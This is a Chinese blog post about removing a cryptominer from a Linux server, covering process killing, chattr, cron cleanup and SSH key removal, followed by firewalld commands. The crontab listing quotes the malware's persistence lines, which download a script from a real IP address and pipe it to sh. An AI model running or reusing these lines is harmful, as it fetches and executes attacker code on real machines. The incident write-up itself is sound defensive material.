早上醒来发现服务器挂掉了,使用top命令查看所有进程,结果让我大吃一惊,有一个名字叫做bbb的进程占用了我99%的cpu,直接杀死该进程好了,但是一分钟后进程又自动复活了!!!
服务器被挖矿程序占用
1.我们先找到该文件的位置
[root@iz2ze147nx2245g08b0sjfz ~]# find / -name bbb
2.将文件可执行的权限给取消
#进入文件目录里
[root@iz2ze147nx2245g08b0sjfz ~]# chmod -x bbb
3.杀死该进程
[root@iz2ze147nx2245g08b0sjfz ~]# ps -ef | grep -v grep | egrep 'bbb' | awk '{print $2}' | xargs kill -9
4.取消无用的定时任务
[root@iz2ze147nx2245g08b0sjfz ~]# crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
定时任务的文件在我们**/var/spool/cron/root**在root文件中保存着,我们直接编辑该文件可能会失败,该文件一个仅读文件,黑客会对我们的文件添加属性,让我们root用户也无法修改,我们可以这样操作
[root@iz2ze147nx2245g08b0sjfz cron]# lsattr root
s---ia-------root
[root@iz2ze147nx2245g08b0sjfz cron]# chattr -isa root
然后删除黑客留下来的定时任务
5.删除挖矿程序
[root@iz2ze147nx2245g08b0sjfz ~]# rm -f bbb
#如果删除失败了,黑客也是添加了文件属性,我们还可以通过lsattr和chattr命令对文件属性进行修改
**6. 清除.ssh/下的公钥文件 **
#该文件在 /root/.ssh文件夹下,将其进行删除
vi authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G
.........
大功告成,开发服务端口的时候我们要避免使用敏感的端口(3306 8080 2375 ),都是自己踩过的坑,希望对看到的人有所帮助。
防火墙常用命令
#基本使用
1.开启 systemctl start firewalld
2.关闭 systemctl stop firewalld
3.查看状态 systemctl status firewalld
4.开机启用 systemctl enable firewalld
#端口操作
5.查看启用端口 firewall-cmd --zone=public --list-ports
6.开发端口 firewall-cmd --zone=public --add-port=80/tcp --permanent (–permanent永久生效,没有此参数重启后失效)
7.关闭端口 firewall-cmd --zone=public --remove-port=80/tcp --permanent
8.更新防火墙规则使其生效 firewall-cmd --reload
9.查看防火墙支持服务 firewall-cmd --get-services
10.添加服务 firewall-cmd --add-service=ftp --permanent (永久开放ftp服务)
10.删除服务 firewall-cmd --remove-service=ftp --permanent